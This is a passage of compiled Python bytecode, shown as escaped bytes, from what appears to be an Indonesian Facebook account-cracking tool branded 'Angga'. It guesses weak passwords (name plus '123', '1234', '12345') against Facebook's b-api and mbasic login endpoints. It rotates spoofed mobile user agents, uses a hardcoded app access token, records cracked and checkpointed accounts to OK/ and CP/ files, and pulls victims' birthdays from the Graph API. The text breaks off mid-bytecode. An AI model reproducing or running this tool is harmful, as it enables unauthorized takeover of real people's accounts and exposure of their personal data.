\x1b[0;92m%s\x1b[0;96m(\x12\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R9\x00\x00\x00R:\x00\x00\x00R1\x00\x00\x00t\x03\x00\x00\x00intt\x05\x00\x00\x00inputt\x05\x00\x00\x00rangeR5\x00\x00\x00R-\x00\x00\x00R.\x00\x00\x00R6\x00\x00\x00t\x01\x00\x00\x00nRY\x00\x00\x00RX\x00\x00\x00RZ\x00\x00\x00R4\x00\x00\x00RN\x00\x00\x00(\x06\x00\x00\x00t\x0b\x00\x00\x00tanya_Totalt\x01\x00\x00\x00tR[\x00\x00\x00R\\\x00\x00\x00R]\x00\x00\x00R;\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>RJ\x00\x00\x00\xe9\x00\x00\x00s&\x00\x00\x00\x00\x02\x03\x01\x19\x01\r\x01\x0e\x01\x03\x01\x16\x01\x03\x00\n\x01\x13\x01\n\x01\x10\x01\x03\x01*\x01\n\x01\x17\x01\x1d\x01\r\x01\r\x01c\x00\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00C\x00\x00\x00sC\x01\x00\x00d\x01\x00GHd\x02\x00GHd\x03\x00GHd\x04\x00GHt\x00\x00d\x05\x00\x83\x01\x00}\x00\x00|\x00\x00d\x06\x00k\x02\x00r6\x00t\x01\x00\x83\x00\x00\x01n\t\x01|\x00\x00d\x07\x00k\x02\x00r\x8c\x00t\x00\x00d\x08\x00\x83\x01\x00}\x01\x00|\x01\x00d\t\x00k\x02\x00rd\x00t\x02\x00\x83\x00\x00\x01n\x00\x00d\n\x00GHt\x03\x00d\x0b\x00\x83\x01\x00j\x04\x00t\x05\x00t\x06\x00\x83\x02\x00\x01t\x07\x00d\x0c\x00\x83\x01\x00\x01n\xb3\x00|\x00\x00d\r\x00k\x02\x00r\xe2\x00t\x00\x00d\x0e\x00\x83\x01\x00}\x01\x00|\x01\x00d\t\x00k\x02\x00r\xba\x00t\x02\x00\x83\x00\x00\x01n\x00\x00d\n\x00GHt\x03\x00d\x0b\x00\x83\x01\x00j\x04\x00t\x08\x00t\x06\x00\x83\x02\x00\x01t\x07\x00d\x0c\x00\x83\x01\x00\x01n]\x00|\x00\x00d\x0f\x00k\x02\x00r8\x01t\x00\x00d\x0e\x00\x83\x01\x00}\x01\x00|\x01\x00d\t\x00k\x02\x00r\x10\x01t\x02\x00\x83\x00\x00\x01n\x00\x00d\n\x00GHt\x03\x00d\x0b\x00\x83\x01\x00j\x04\x00t\t\x00t\x06\x00\x83\x02\x00\x01t\x07\x00d\x0c\x00\x83\x01\x00\x01n\x07\x00t\x01\x00\x83\x00\x00\x01d\x00\x00S(\x10\x00\x00\x00NsM\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Choose Crack Methode [ \x1b[1;92mRecommended B-API \x1b[1;97m]s[\x00\x00\x00\x1b[1;96m[\x1b[1;93m1\x1b[1;96m] \x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2 \x1b[1;97mB-API\x1b[1;97m [ \x1b[1;95mFast \x1b[1;97m]s]\x00\x00\x00\x1b[1;96m[\x1b[1;93m2\x1b[1;96m] \x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2 \x1b[1;97mM-Basic\x1b[1;97m [ \x1b[1;95mFast \x1b[1;97m]se\x00\x00\x00\x1b[1;96m[\x1b[1;93m3\x1b[1;96m] \x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2 \x1b[1;97mFree Facebook\x1b[1;97m [ \x1b[1;95mNormal \x1b[1;97m]sA\x00\x00\x00\x1b[1;96m[\x1b[1;93m+\x1b[1;96m] \x1b[1;92mAngga \x1b[1;96m\xe2\x84\xa2 \x1b[1;97mOption : R*\x00\x00\x00R=\x00\x00\x00s^\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Do You Choose Manual Passwors? y/t\x1b[1;97m [ \x1b[1;92mDefault: t\x1b[1;97m ] : t\x01\x00\x00\x00yRA\x00\x00\x00i\x1e\x00\x00\x00s\x0b\x00\x00\x00Program EndR>\x00\x00\x00s]\x00\x00\x00\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4\x1b[1;97m Do You Choose Manual passwords? y/t\x1b[1;97m [ \x1b[1;92mDefault: t\x1b[1;97m ] R?\x00\x00\x00(\n\x00\x00\x00R5\x00\x00\x00R3\x00\x00\x00t\x06\x00\x00\x00manualR\x00\x00\x00\x00t\x03\x00\x00\x00mapt\x04\x00\x00\x00bapiRX\x00\x00\x00R1\x00\x00\x00t\x06\x00\x00\x00mbasict\x06\x00\x00\x00mobile(\x02\x00\x00\x00RH\x00\x00\x00t\x03\x00\x00\x00ask(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>RH\x00\x00\x00\xfe\x00\x00\x00s:\x00\x00\x00\x00\x01\x05\x01\x05\x01\x05\x01\x05\x01\x0c\x01\x0c\x01\n\x01\x0c\x01\x0c\x01\x0c\x01\n\x01\x05\x01\x16\x01\r\x01\x0c\x01\x0c\x01\x0c\x01\n\x01\x05\x01\x16\x01\r\x01\x0c\x01\x0c\x01\x0c\x01\n\x01\x05\x01\x16\x01\r\x02c\x02\x00\x00\x00\t\x00\x00\x00\x0b\x00\x00\x00C\x00\x00\x00s\x01\x01\x00\x00y\xcf\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x02\x00t\x02\x00j\x03\x00\x83\x00\x00\x8f\xa8\x00}\x03\x00|\x03\x00j\x04\x00d\x03\x00|\x00\x00|\x02\x00f\x02\x00\x16\x83\x01\x00j\x05\x00\x83\x00\x00d\x04\x00\x19}\x04\x00|\x04\x00j\x06\x00d\x05\x00\x83\x01\x00\\\x03\x00}\x05\x00}\x06\x00}\x07\x00t\x07\x00|\x05\x00\x19}\x05\x00d\x06\x00|\x00\x00|\x01\x00|\x06\x00|\x05\x00|\x07\x00f\x05\x00\x16GHt\x08\x00j\t\x00d\x07\x00|\x00\x00|\x01\x00f\x02\x00\x16\x83\x01\x00\x01t\x00\x00d\x08\x00t\n\x00\x16d\t\x00\x83\x02\x00j\x0b\x00d\n\x00|\x00\x00|\x01\x00|\x06\x00|\x05\x00|\x07\x00f\x05\x00\x16\x83\x01\x00\x01Wd\x00\x00QXWn+\x00\x04t\x0c\x00k\n\x00r\xf6\x00\x01}\x08\x00\x01d\x0b\x00}\x06\x00d\x0b\x00}\x05\x00d\x0b\x00}\x07\x00n\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(\x0c\x00\x00\x00Ns\t\x00\x00\x00login.txtR)\x00\x00\x00s-\x00\x00\x00https://graph.facebook.com/%s?access_token=%st\x08\x00\x00\x00birthdayt\x01\x00\x00\x00/s(\x00\x00\x00\r\x1b[0;96m[ANGGA_CP] %s|%s|%s %s %s\x1b[0;96ms\x05\x00\x00\x00%s|%ss\t\x00\x00\x00CP/%s.txtt\x01\x00\x00\x00as\x12\x00\x00\x00 + %s|%s|%s %s %s\nRA\x00\x00\x00(\r\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R-\x00\x00\x00t\x07\x00\x00\x00SessionR.\x00\x00\x00R6\x00\x00\x00t\x05\x00\x00\x00splitt\t\x00\x00\x00bulan_ttlt\x02\x00\x00\x00cpRZ\x00\x00\x00t\x07\x00\x00\x00tanggalR\x12\x00\x00\x00R4\x00\x00\x00(\t\x00\x00\x00R]\x00\x00\x00t\x02\x00\x00\x00pwR9\x00\x00\x00t\x03\x00\x00\x00sest\x03\x00\x00\x00ttlt\x05\x00\x00\x00montht\x03\x00\x00\x00dayt\x04\x00\x00\x00yearR:\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>t\n\x00\x00\x00cek_ttl_cp\x1e\x01\x00\x00s\x1e\x00\x00\x00\x00\x01\x03\x01\x15\x01\x0f\x01#\x01\x18\x01\n\x01\x18\x01\x17\x017\x01\x0f\x01\x06\x01\x06\x01\t\x01\x03\x00c\x01\x00\x00\x00\t\x00\x00\x00\x07\x00\x00\x00C\x00\x00\x00s2\x03\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x01\x00WnG\x00\x04t\x02\x00k\n\x00rb\x00\x01\x01\x01d\x03\x00}\x01\x00d\x04\x00}\x01\x00d\x05\x00}\x01\x00d\x06\x00}\x01\x00d\x07\x00}\x01\x00d\x08\x00}\x01\x00d\t\x00}\x01\x00d\n\x00}\x01\x00d\x0b\x00}\x01\x00n\x01\x00Xt\x03\x00j\x04\x00j\x05\x00d\x0c\x00t\x06\x00t\x07\x00t\x08\x00\x83\x01\x00t\x07\x00t\t\x00\x83\x01\x00t\x07\x00t\n\x00\x83\x01\x00f\x04\x00\x16\x83\x01\x00\x01t\x03\x00j\x04\x00j\x0b\x00\x83\x00\x00\x01|\x00\x00j\x0c\x00d\r\x00\x83\x01\x00\\\x02\x00}\x02\x00}\x03\x00t\x07\x00|\x03\x00\x83\x01\x00d\x0e\x00k\x05\x00r\xea\x00|\x03\x00|\x03\x00d\x0f\x00\x17|\x03\x00d\x10\x00\x17|\x03\x00d\x11\x00\x17g\x04\x00}\x04\x00n{\x00t\x07\x00|\x03\x00\x83\x01\x00d\x12\x00k\x01\x00r\x1a\x01|\x03\x00d\x13\x00\x17|\x03\x00d\x14\x00\x17|\x03\x00d\x15\x00\x17g\x03\x00}\x04\x00nK\x00t\x07\x00|\x03\x00\x83\x01\x00d\x16\x00k\x01\x00rJ\x01|\x03\x00d\x17\x00\x17|\x03\x00d\x10\x00\x17|\x03\x00d\x11\x00\x17g\x03\x00}\x04\x00n\x1b\x00|\x03\x00d\x11\x00\x17|\x03\x00d\x14\x00\x17|\x03\x00d\x15\x00\x17g\x03\x00}\x04\x00y\xbf\x01x\xae\x01|\x04\x00D]\xa6\x01}\x05\x00|\x05\x00j\r\x00\x83\x00\x00}\x05\x00t\x0e\x00j\x0f\x00\x83\x00\x00}\x06\x00i\x08\x00t\x10\x00t\x11\x00j\x12\x00d\x18\x00d\x19\x00\x83\x02\x00\x83\x01\x00d\x1a\x006t\x10\x00t\x11\x00j\x12\x00d\x1b\x00d\x1c\x00\x83\x02\x00\x83\x01\x00d\x1d\x006t\x10\x00t\x11\x00j\x12\x00d\x1b\x00d\x1c\x00\x83\x02\x00\x83\x01\x00d\x1e\x006d\x1f\x00d \x006d!\x00d"\x006|\x01\x00d#\x006d$\x00d%\x006d&\x00d\'\x006}\x07\x00|\x06\x00j\x13\x00d(\x00t\x10\x00|\x02\x00\x83\x01\x00\x17d)\x00\x17t\x10\x00|\x05\x00\x83\x01\x00\x17d*\x00\x17d+\x00|\x07\x00\x83\x01\x01}\x08\x00d,\x00|\x08\x00j\x14\x00k\x06\x00r\xae\x02d-\x00|\x08\x00j\x14\x00k\x06\x00r\xae\x02d.\x00|\x02\x00|\x05\x00|\x08\x00j\x15\x00\x83\x00\x00d/\x00\x19f\x03\x00\x16GHt\t\x00j\x16\x00d0\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01t\x00\x00d1\x00t\x17\x00\x16d2\x00\x83\x02\x00j\x05\x00d3\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01Pqo\x01qo\x01d4\x00|\x08\x00j\x15\x00\x83\x00\x00d5\x00\x19k\x06\x00ro\x01d6\x00|\x02\x00|\x05\x00f\x02\x00\x16GHt\n\x00j\x16\x00d0\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01t\x00\x00d7\x00t\x17\x00\x16d2\x00\x83\x02\x00j\x05\x00d3\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01Pqo\x01qo\x01qo\x01Wt\x06\x00d8\x007a\x06\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(9\x00\x00\x00Ns\x03\x00\x00\x00.uaR)\x00\x00\x00s\x8d\x00\x00\x00Mozilla/5.0 (Linux; U; Android 4.1.2; de-de; GT-I8190 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30;]s\x86\x00\x00\x00Mozilla/5.0 (Linux; Android 5.1; A1601 Build/LMY47I) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36;]s\x8f\x00\x00\x00Mozilla/5.0 (Linux; Android 6.0; MYA-L22 Build/HUAWEIMYA-L22) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.84 Mobile Safari/537.36;]s\xa5\x00\x00\x00Mozilla/5.0 (Linux; Android 7.0; SAMSUNG SM-G610M Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/7.4 Chrome/59.0.3071.125 Mobile Safari/537.36;]s\x8a\x00\x00\x00Mozilla/5.0 (Linux; Android 7.1; vivo 1716 Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.98 Mobile Safari/537.36;]s\x96\x00\x00\x00Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-G950U) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/10.2 Chrome/71.0.3578.99 Mobile Safari/537.36;]s\xcc\x00\x00\x00Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/239.0.0.10.109;]s\x1f\x01\x00\x00Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/323.0.0.46.119;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]s|\x00\x00\x00NokiaC3-00/5.0 (07.20) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420;]sO\x00\x00\x00\r\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4 \x1b[0;92mCRACK \x1b[0;93m\xe2\x80\xa2\xe2\x80\xa2>\x1b[0;96m %s/%s \xe2\x80\xa2> [OK:-%s]-[CP:-%s] s\x03\x00\x00\x00<=>i\x06\x00\x00\x00R=\x00\x00\x00R$\x00\x00\x00t\x03\x00\x00\x00123i\x02\x00\x00\x00R?\x00\x00\x00t\x04\x00\x00\x001234t\x05\x00\x00\x0012345i\x03\x00\x00\x00R>\x00\x00\x00g\x00\x00\x00\x00\xd0\x12sAg\x00\x00\x00\x008\x9c|As\x19\x00\x00\x00x-fb-connection-bandwidthi N\x00\x00i@\x9c\x00\x00s\x0c\x00\x00\x00x-fb-sim-hnis\x0c\x00\x00\x00x-fb-net-hnit\t\x00\x00\x00EXCELLENTs\x17\x00\x00\x00x-fb-connection-qualitys!\x00\x00\x00cell.CTRadioAccessTechnologyHSDPAs\x14\x00\x00\x00x-fb-connection-types\n\x00\x00\x00user-agents!\x00\x00\x00application/x-www-form-urlencodeds\x0c\x00\x00\x00content-typet\x05\x00\x00\x00Ligers\x10\x00\x00\x00x-fb-http-engines?\x00\x00\x00https://b-api.facebook.com/method/auth.login?format=json&email=s\n\x00\x00\x00&password=s\xae\x01\x00\x00&credentials_type=device_based_login_password&generate_session_cookies=1&error_detail_type=button_with_disabled&source=device_based_login&meta_inf_fbmeta=%20¤tly_logged_in_userid=0&method=GET&locale=en_US&client_country_code=US&fb_api_caller_class=com.facebook.fos.headersv2.fb4aorca.HeadersV2ConfigFetchRequestHandler&access_token=350685531728|62f8ce9f74b12f84c123cc23437a4a32&fb_api_req_friendly_name=authenticate&cpl=truet\x07\x00\x00\x00headerst\x0b\x00\x00\x00session_keyt\x04\x00\x00\x00EAAAs"\x00\x00\x00\r\x1b[0;92m[ANGGA_OK] %s|%s|%s\x1b[0;97mt\x0c\x00\x00\x00access_tokens\x05\x00\x00\x00%s|%ss\t\x00\x00\x00OK/%s.txtRm\x00\x00\x00s\t\x00\x00\x00 + %s|%s\ns\x10\x00\x00\x00www.facebook.comt\t\x00\x00\x00error_msgs\'\x00\x00\x00\r\x1b[0;96m[ANGGA_CP] %s|%s\x1b[0;96m s\t\x00\x00\x00CP/%s.txti\x01\x00\x00\x00(\x18\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R:\x00\x00\x00R\x10\x00\x00\x00R\x11\x00\x00\x00R\x12\x00\x00\x00t\x04\x00\x00\x00loopRN\x00\x00\x00RX\x00\x00\x00t\x02\x00\x00\x00okRq\x00\x00\x00R\x13\x00\x00\x00Ro\x00\x00\x00R7\x00\x00\x00R-\x00\x00\x00Rn\x00\x00\x00t\x03\x00\x00\x00strt\x06\x00\x00\x00randomt\x07\x00\x00\x00randintR.\x00\x00\x00t\x04\x00\x00\x00textR6\x00\x00\x00RZ\x00\x00\x00t\x07\x00\x00\x00tBilall(\t\x00\x00\x00t\x04\x00\x00\x00usert\x02\x00\x00\x00uaR]\x00\x00\x00R+\x00\x00\x00t\x03\x00\x00\x00pwxRs\x00\x00\x00Rt\x00\x00\x00t\x08\x00\x00\x00headers_t\x04\x00\x00\x00send(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rg\x00\x00\x00.\x01\x00\x00sX\x00\x00\x00\x00\x01\x03\x01\x19\x01\r\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\n\x02\t\x01)\x01\r\x01\x15\x01\x12\x01!\x01\x12\x01\x1e\x01\x12\x01\x1e\x02\x1b\x01\x03\x01\r\x01\x0c\x01\x0c\x01t\x011\x01\x1e\x01\x1c\x01\x17\x01$\x01\x01\x01\x06\x01\x16\x01\x0f\x01\x17\x01$\x01\x01\x01\n\x02\x0e\x01\x03\x01c\x01\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00C\x00\x00\x00s\xfb\x03\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x01\x00Wn\x1d\x00\x04t\x02\x00k\n\x00r8\x00\x01\x01\x01d\x03\x00}\x01\x00d\x04\x00}\x01\x00n\x01\x00Xt\x03\x00j\x04\x00j\x05\x00d\x05\x00t\x06\x00t\x07\x00t\x08\x00\x83\x01\x00t\x07\x00t\t\x00\x83\x01\x00t\x07\x00t\n\x00\x83\x01\x00f\x04\x00\x16\x83\x01\x00\x01t\x03\x00j\x04\x00j\x0b\x00\x83\x00\x00\x01|\x00\x00j\x0c\x00d\x06\x00\x83\x01\x00\\\x02\x00}\x02\x00}\x03\x00t\x07\x00|\x03\x00\x83\x01\x00d\x07\x00k\x05\x00r\xc0\x00|\x03\x00|\x03\x00d\x08\x00\x17|\x03\x00d\t\x00\x17|\x03\x00d\n\x00\x17g\x04\x00}\x04\x00nm\x00t\x07\x00|\x03\x00\x83\x01\x00d\x0b\x00k\x01\x00r\xf0\x00|\x03\x00d\x08\x00\x17|\x03\x00d\t\x00\x17|\x03\x00d\n\x00\x17g\x03\x00}\x04\x00n=\x00t\x07\x00|\x03\x00\x83\x01\x00d\x0c\x00k\x01\x00r\x19\x01|\x03\x00d\x08\x00\x17|\x03\x00d\n\x00\x17g\x02\x00}\x04\x00n\x14\x00|\x03\x00d\x08\x00\x17|\x03\x00d\n\x00\x17g\x02\x00}\x04\x00y\xc0\x02x\xaf\x02|\x04\x00D]\xa7\x02}\x05\x00i\x00\x00}\x06\x00|\x05\x00j\r\x00\x83\x00\x00}\x05\x00t\x0e\x00j\x0f\x00\x83\x00\x00}\x07\x00|\x07\x00j\x10\x00j\x11\x00i\n\x00d\r\x00d\x0e\x006d\x0f\x00d\x10\x006d\x11\x00d\x12\x006d\x13\x00d\x14\x006|\x01\x00d\x15\x006d\x16\x00d\x17\x006d\x18\x00d\x19\x006d\x1a\x00d\x1b\x006d\x1c\x00d\x1d\x006d\x1e\x00d\x1f\x006\x83\x01\x00\x01|\x07\x00j\x12\x00d \x00\x83\x01\x00j\x13\x00}\x08\x00t\x14\x00|\x08\x00d!\x00\x83\x02\x00}\t\x00d"\x00d#\x00d$\x00d%\x00d&\x00d\'\x00d(\x00g\x07\x00}\n\x00xc\x00|\t\x00d)\x00\x83\x01\x00D]U\x00}\x0b\x00yE\x00|\x0b\x00j\x12\x00d*\x00\x83\x01\x00|\n\x00k\x06\x00rA\x02|\x06\x00j\x11\x00i\x01\x00|\x0b\x00j\x12\x00d+\x00\x83\x01\x00|\x0b\x00j\x12\x00d*\x00\x83\x01\x006\x83\x01\x00\x01n\x03\x00w\xfa\x01Wq\xfa\x01\x01\x01\x01q\xfa\x01Xq\xfa\x01W|\x06\x00j\x11\x00i\x0b\x00|\x02\x00d,\x006|\x05\x00d-\x006d.\x00d/\x006d.\x00d0\x006d.\x00d1\x006d.\x00d2\x006d.\x00d3\x006d4\x00d5\x006d4\x00d6\x006d4\x00d7\x006d8\x00d9\x006\x83\x01\x00\x01|\x07\x00j\x15\x00d:\x00d;\x00|\x06\x00\x83\x01\x01}\x0c\x00d<\x00|\x07\x00j\x16\x00j\x17\x00\x83\x00\x00j\x18\x00\x83\x00\x00k\x06\x00rr\x03d=\x00j\x19\x00g\x00\x00|\x07\x00j\x16\x00j\x17\x00\x83\x00\x00j\x1a\x00\x83\x00\x00D]\x1c\x00\\\x02\x00}\r\x00}\x0e\x00d>\x00|\r\x00|\x0e\x00f\x02\x00\x16^\x02\x00q\xf9\x02\x83\x01\x00}\x0f\x00d?\x00|\x02\x00|\x05\x00|\x0f\x00f\x03\x00\x16GHt\t\x00j\x1b\x00d@\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01t\x00\x00dA\x00t\x1c\x00\x16dB\x00\x83\x02\x00j\x05\x00dC\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01Pq7\x01q7\x01dD\x00|\x07\x00j\x16\x00j\x17\x00\x83\x00\x00j\x18\x00\x83\x00\x00k\x06\x00r7\x01dE\x00|\x02\x00|\x05\x00f\x02\x00\x16GHt\n\x00j\x1b\x00d@\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01t\x00\x00dF\x00t\x1c\x00\x16dB\x00\x83\x02\x00j\x05\x00dC\x00|\x02\x00|\x05\x00f\x02\x00\x16\x83\x01\x00\x01Pq7\x01q7\x01q7\x01Wt\x06\x00dG\x007a\x06\x00Wn\x07\x00\x01\x01\x01n\x01\x00Xd\x00\x00S(H\x00\x00\x00Ns\x03\x00\x00\x00.uaR)\x00\x00\x00s\xcb\x00\x00\x00Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36[FBAN/EMA;FBLC/it_IT;FBAV/239.0.0.10.109;]s\xec\x01\x00\x00Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/323.0.0.46.119;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;], Mozilla/5.0 (Linux; Android 10; Mi 9T Pro Build/QKQ1.190825.002; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.181 Mobile Safari/537.36 [FBAN/EMA;FBLC/id_ID;FBAV/255.0.0.8.119;]sO\x00\x00\x00\r\x1b[1;93m\xe2\x97\x8d\xe2\x9e\xa4 \x1b[0;92mCRACK \x1b[0;93m\xe2\x80\xa2\xe2\x80\xa2>\x1b[0;96m %s/%s \xe2\x80\xa2> [OK:-%s]-[CP:-%s] s\x03\x00\x00\x00<=>i\x06\x00\x00\x00Rz\x00\x00\x00R{\x00\x00\x00R|\x00\x00\x00i\x02\x00\x00\x00i\x03\x00\x00\x00s\x1b\x00\x00\x00https://mbasic.facebook.comt\x06\x00\x00\x00origins#\x00\x00\x00id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7s\x0f\x00\x00\x00accept-languages\r\x00\x00\x00gzip, deflates\x0f\x00\x00\x00accept-encodingsU\x00\x00\x00text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8t\x06\x00\x00\x00accepts\n\x00\x00\x00user-agents\x13\x00\x00\x00mbasic.facebook.comt\x04\x00\x00\x00Hosts:\x00\x00\x00https://mbasic.facebook.com/login/?next&ref=dbl&fl&refid=8t\x07\x00\x00\x00referers\t\x00\x00\x00max-age=0s\r\x00\x00\x00cache-controlR=\x00\x00\x00s\x19\x00\x00\x00upgrade-insecure-requestss!\x00\x00\x00application/x-www-form-urlencodeds\x0c\x00\x00\x00content-types7\x00\x00\x00https://mbasic.facebook.com/login/?next&ref=dbl&refid=8s\x0b\x00\x00\x00html.parsert\x03\x00\x00\x00lsdt\x07\x00\x00\x00jazoestt\x04\x00\x00\x00m_tst\x02\x00\x00\x00lit\n\x00\x00\x00try_numbert\x12\x00\x00\x00unrecognized_triesR<\x00\x00\x00R_\x00\x00\x00R+\x00\x00\x00t\x05\x00\x00\x00valuet\x05\x00\x00\x00emailt\x04\x00\x00\x00passR*\x00\x00\x00t\x15\x00\x00\x00prefill_contact_pointt\x0e\x00\x00\x00prefill_sourcet\x0c\x00\x00\x00prefill_typet\x14\x00\x00\x00first_prefill_sourcet\x12\x00\x00\x00first_prefill_typet\x05\x00\x00\x00falset\x10\x00\x00\x00had_cp_prefilledt\x16\x00\x00\x00had_password_prefilledt\r\x00\x00\x00is_smart_lockt\x04\x00\x00\x00truet\x0c\x00\x00\x00_fb_noscriptsy\x00\x00\x00https://mbasic.facebook.com/login/device-based/regular/login/?refsrc=https%3A%2F%2Fmbasic.facebook.com%2F&lwv=100&refid=8RW\x00\x00\x00t\x06\x00\x00\x00c_usert\x01\x00\x00\x00;s\x05\x00\x00\x00%s=%ss"\x00\x00\x00\r\x1b[0;92m[ANGGA_OK] %s|%s|%s\x1b[0;95ms\x05\x00\x00\x00%s|%ss\t\x00\x00\x00OK/%s.txtRm\x00\x00\x00s\t\x00\x00\x00 + %s|%s\nt\n\x00\x00\x00checkpoints\'\x00\x00\x00\r\x1b[0;96m[ANGGA_CP] %s|%s\x1b[0;96m s\t\x00\x00\x00CP/%s.txti\x01\x00\x00\x00(\x1d\x00\x00\x00R2\x00\x00\x00RE\x00\x00\x00R:\x00\x00\x00R\x10\x00\x00\x00R\x11\x00\x00\x00R\x12\x00\x00\x00R\x84\x00\x00\x00RN\x00\x00\x00RX\x00\x00\x00R\x85\x00\x00\x00Rq\x00\x00\x00R\x13\x00\x00\x00Ro\x00\x00\x00R7\x00\x00\x00R-\x00\x00\x00Rn\x00\x00\x00R\x7f\x00\x00\x00t\x06\x00\x00\x00updateR.\x00\x00\x00R\x89\x00\x00\x00t\x06\x00\x00\x00parserR8\x00\x00\x00t\x07\x00\x00\x00cookiest\x08\x00\x00\x00get_dictt\x04\x00\x00\x00keyst\x04\x00\x00\x00joint\x05\x00\x00\x00itemsRZ\x00\x00\x00R\x8a\x00\x00\x00(\x10\x00\x00\x00R\x8b\x00\x00\x00R\x8c\x00\x00\x00R]\x00\x00\x00R+\x00\x00\x00R\x8d\x00\x00\x00Rs\x00\x00\x00t\x06\x00\x00\x00kwargsRt\x00\x00\x00t\x01\x00\x00\x00pt\x01\x00\x00\x00bt\x02\x00\x00\x00blR\\\x00\x00\x00t\x04\x00\x00\x00gaaat\x03\x00\x00\x00keyR\x9a\x00\x00\x00t\x04\x00\x00\x00kuki(\x00\x00\x00\x00(\x00\x00\x00\x00s\x10\x00\x00\x00<Ahmad_Riswanto>Rh\x00\x00\x00_\x01\x00\x00sd\x00\x00\x00\x00\x01\x03\x01\x19\x01\r\x01\x06\x01\n\x02\t\x01)\x01\r\x01\x15\x01\x12\x01!\x01\x12\x01\x1e\x01\x12\x01\x17\x02\x14\x01\x03\x01\r\x01\x06\x01\x0c\x01\x0c\x01V\x01\x12\x01\x0f\x01\x1b\x01\x13\x01\x03\x01\x15\x00)\x01\x07\x01\x03\x00\x08\x01Z\x01\x15\x01\x1b\x01A\x01\x12\x01\x17\x01$\x01\x01\x01\x06\x01\x1b\x01\x0f\x01\x17\x01$\x01\x01\x01\n\x02\x0e\x01\x03\x01c\x01\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00C\x00\x00\x00s\x01\x04\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x01\x00Wn#\x00\x04t\x02\x00k\n\x00r>\x00\x01\x01\x01d\x03\x00}\x01\x00d\x04\x00}\x01\x00d\x05\x00}\x01\x00n\x01\x00Xt\x03\x00j\x04\x00j\x05\x00d\x06\x00t\x06\x00t\x07\x00t\x08\x00\x83\x01\x00t\x07\x00t\t\x00\x83\x01\x00t\x07\x00t\n\x00\x83\x01\x00f\x04\x00\x16\x83\x01\x00\x01t\x03\x00j\x04\x00j\x0b\x00\x83\x00\x00\x01|\x00\x00j\x0c\x00d\x07\x00\x83\x01\x00\\\x02\x00}\x02\x00}\x03\x00t\x07\x00|\x03\x00\x83\x01\x00d\x08\x